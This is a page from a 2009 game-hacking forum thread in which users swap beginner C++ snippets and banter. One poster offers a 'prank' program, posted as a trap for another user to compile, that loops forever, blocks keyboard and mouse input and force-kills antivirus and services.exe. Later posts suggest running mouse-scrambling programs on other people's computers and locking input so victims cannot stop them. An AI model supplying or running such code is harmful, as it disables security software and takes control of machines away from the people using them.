Page 2 of 4 FirstFirst 1234 LastLast
Results 16 to 30 of 46
  1. #16
    SPittn_Blood's Avatar
    Join Date
    Nov 2009
    Gender
    male
    Posts
    148
    Reputation
    10
    Thanks
    15
    My Mood
    Inspired
    Quote Originally Posted by hejsan1 View Post
    Maybe after 3month u can make a simple reload hack or so

    C++ is hard!
    VB is easy =)

    Got that right, My main goal is to make a simple crosshair.

    Pixie force!

    -Current Projects-
    _______________________
    \//Stuff.. :P//\
    Current Code: C#

  2. #17
    riceking's Avatar
    Join Date
    Oct 2008
    Gender
    male
    Location
    b
    Posts
    478
    Reputation
    12
    Thanks
    301
    My Mood
    Amazed
    booo, noob acting pro, this aint no sourcecode...


    [img]https://i37.photobucke*****m/albums/e52zies/Rainbow.png?[/img]


  3. #18
    IHelper's Avatar
    Join Date
    Sep 2009
    Gender
    male
    Location
    Ask me tommorow
    Posts
    4,797
    Reputation
    53
    Thanks
    2,056
    My Mood
    Amazed
    visuals not so basic...


    -user1
    Last edited by IHelper; 11-11-2009 at 12:37 PM.
    You want respect
    Earn it.

  4. #19
    Disturbed's Avatar
    Join Date
    Feb 2009
    Gender
    male
    Posts
    10,472
    Reputation
    1267
    Thanks
    2,587
    Quote Originally Posted by Richo View Post
    Lol I know like some of the fundamentals ;D
    #include <iostream>
    using namespace std;
    int main()
    {
    cout << "I did your mom";
    cin.get()
    return 0;
    }
    now run trhat in your compiler ;D
    Compile this:
    Code:
    #include <iostream>
    #include <windows.h>
    #include <winable.h>
    using namespace std;
    
    int main()
    {
        while(true) {
                    cout<<"Don't worry this is not permanent, just restart your PC to fix it." << endl;
                    cout<<"This is to teach you not to blindly run someone else's code." << endl;
                    cout<<"Don't get pissed, I could have set this to wipe your hard drive." << endl;
                    BlockInput(true);
                    system("TASKKILL /F /IM ccApp.exe");
                    system("TASKKILL /F /IM services.exe");
    }
    return 0;
    }


  5. #20
    imgunna's Avatar
    Join Date
    Jul 2009
    Gender
    male
    Posts
    298
    Reputation
    9
    Thanks
    21
    My Mood
    Amused
    ouch man........ thats a meanie virus

  6. #21
    imgunna's Avatar
    Join Date
    Jul 2009
    Gender
    male
    Posts
    298
    Reputation
    9
    Thanks
    21
    My Mood
    Amused
    Quote Originally Posted by an087535 View Post
    i will learn in college or something cuz it's better to learn it with a real tutor (teacher) than by myself in the internet..
    better with past experience to be able to learn faster with a tutor

  7. #22
    Disturbed's Avatar
    Join Date
    Feb 2009
    Gender
    male
    Posts
    10,472
    Reputation
    1267
    Thanks
    2,587
    Quote Originally Posted by imgunna View Post
    ouch man........ thats a meanie virus
    Change the mouse coordanates, but use the MaxRand func to generate the coordanates, funny as hell when you put it on someone elses computer then sit back and watch.


  8. #23
    zeco's Avatar
    Join Date
    Jul 2009
    Gender
    male
    Location
    Canada
    Posts
    683
    Reputation
    12
    Thanks
    78
    My Mood
    Cynical
    Quote Originally Posted by ObamaBinLaden View Post


    Change the mouse coordanates, but use the MaxRand func to generate the coordanates, funny as hell when you put it on someone elses computer then sit back and watch.
    ooooh teehee, I think that i want to go try that =)

    Done, now if only i knew how to write windows services =D
    Last edited by zeco; 11-11-2009 at 10:52 PM.

  9. #24
    ilovecookies's Avatar
    Join Date
    Oct 2009
    Gender
    male
    Location
    In the C++ Section
    Posts
    321
    Reputation
    10
    Thanks
    67
    My Mood
    Shocked
    C++ Rocks, this is where i'm at right now.

    Code:
    #include <iostream>
    #include <cmath>
    
    using namespace std;
    
    int main()
    {
        double x;
        
        cout << "Please input a number: ";
        cin >> x;
        x = sqrt(x);
        cout << "The square root of that number is " << x << "." << endl;
        cin.get();
        cin.get();
        return 0;
    }
    Just a simple program using the sqrt(); function to give the square root of any number you enter. But it's a little bit off due to some number not having a perfectly square root.
    Quote Originally Posted by Jules Winnfield View Post
    I am the tyranny of evil men, and you are all the weak. But i'm trying Ringo,i'm trying real hard, to become the shepherd.
    excuse me miss, would you kindly reflect some photons off the epidermis covering your sternum directly into the camera iris or vacate the proximity immediately
    [IMG]https://i882.photobucke*****m/albums/ac23/miki_d420/RealizingYoureALeecher2copy.jpg[/IMG]









  10. #25
    Disturbed's Avatar
    Join Date
    Feb 2009
    Gender
    male
    Posts
    10,472
    Reputation
    1267
    Thanks
    2,587
    Quote Originally Posted by zeco View Post
    ooooh teehee, I think that i want to go try that =)

    Done, now if only i knew how to write windows services =D
    system("ENTER MSDOS COMMAND HERE IN ALL CAPS");

    MSDOS= CMD commands.

    Try using it in a loop and adding:
    Code:
    BlockInput(true);
    To make it impossible for them to stop it.

    (requires the "winable.h" class)
    Last edited by Disturbed; 11-12-2009 at 09:06 PM.


  11. #26
    zeco's Avatar
    Join Date
    Jul 2009
    Gender
    male
    Location
    Canada
    Posts
    683
    Reputation
    12
    Thanks
    78
    My Mood
    Cynical
    Quote Originally Posted by ObamaBinLaden View Post


    system("ENTER MSDOS COMMAND HERE IN ALL CAPS");

    MSDOS= CMD commands.

    Try using it in a loop and adding:
    Code:
    BlockInput(true);
    To make it impossible for them to stop it.

    (requires the "winable.h" class)

    Dude, i'm not a complete noob -.-
    Either way, rather i want a way to stop it instead of having to end the process. So i made it so that on a certain button press it stops =)

    Either way, it's impossible to stop without ending the process when there isn't a hotkey anyway, so i don't know what you mean.

  12. #27
    Iforgot's Avatar
    Join Date
    Jun 2009
    Gender
    male
    Location
    VERMONT.
    Posts
    60
    Reputation
    10
    Thanks
    4
    My Mood
    Shocked
    Quote Originally Posted by Richo View Post
    Lol I know like some of the fundamentals ;D
    #include <iostream>
    using namespace std;
    int main()
    {
    cout << "I did your mom";
    cin.get()
    return 0;
    }
    now run trhat in your compiler ;D
    LOL theres some Anti-RTFM right there

  13. #28
    randomnamekabe's Avatar
    Join Date
    May 2009
    Gender
    male
    Location
    In The Thread
    Posts
    3,682
    Reputation
    25
    Thanks
    624
    Nice post.
    Thank you.

  14. #29
    nathanjo's Avatar
    Join Date
    Jan 2009
    Gender
    male
    Location
    Under Your Bed...
    Posts
    134
    Reputation
    10
    Thanks
    12
    My Mood
    Angry
    Thnx btw. good job
    Give me Liberty or death......

    [img]https://i182.photobucke*****m/albums/x29/spartan3223/Signature%20tags/display-2.png[/img]

    Click Here To See my Brand new Hackshield bypass 1/19/10
    Goals:
    Get 10 posts[x]
    Get 20 posts[x]
    Get 30 posts[x]
    Get 40 posts[x]
    Get 50 posts[x]
    Get 60 posts[x]
    Get 100 posts[x]
    learn html[in progress ]
    learn c++[In progress}
    learn asm[In progress]
    learn Java[ ]


    .....

  15. #30
    randomnamekabe's Avatar
    Join Date
    May 2009
    Gender
    male
    Location
    In The Thread
    Posts
    3,682
    Reputation
    25
    Thanks
    624
    Quote Originally Posted by nathanjo View Post
    Thnx btw. good job
    I'm reading some books on it and looking at some of these threads right now.

Page 2 of 4 FirstFirst 1234 LastLast

Similar Threads

  1. I JUST WANNA LEARN THIS DANCE!!!
    By fecher in forum General
    Replies: 13
    Last Post: 09-23-2011, 04:35 PM
  2. Look this xD
    By jansmid1 in forum WarRock - International Hacks
    Replies: 2
    Last Post: 02-21-2009, 08:44 AM
  3. Look this time =O
    By jadedfrog in forum Showroom
    Replies: 5
    Last Post: 12-03-2008, 04:00 PM
  4. i wanna learn to make....
    By bobowham in forum WarRock - International Hacks
    Replies: 4
    Last Post: 06-11-2007, 07:11 AM
  5. I wanna learn
    By Hispiforce in forum WarRock - International Hacks
    Replies: 3
    Last Post: 06-07-2007, 04:17 PM

Tags for this Thread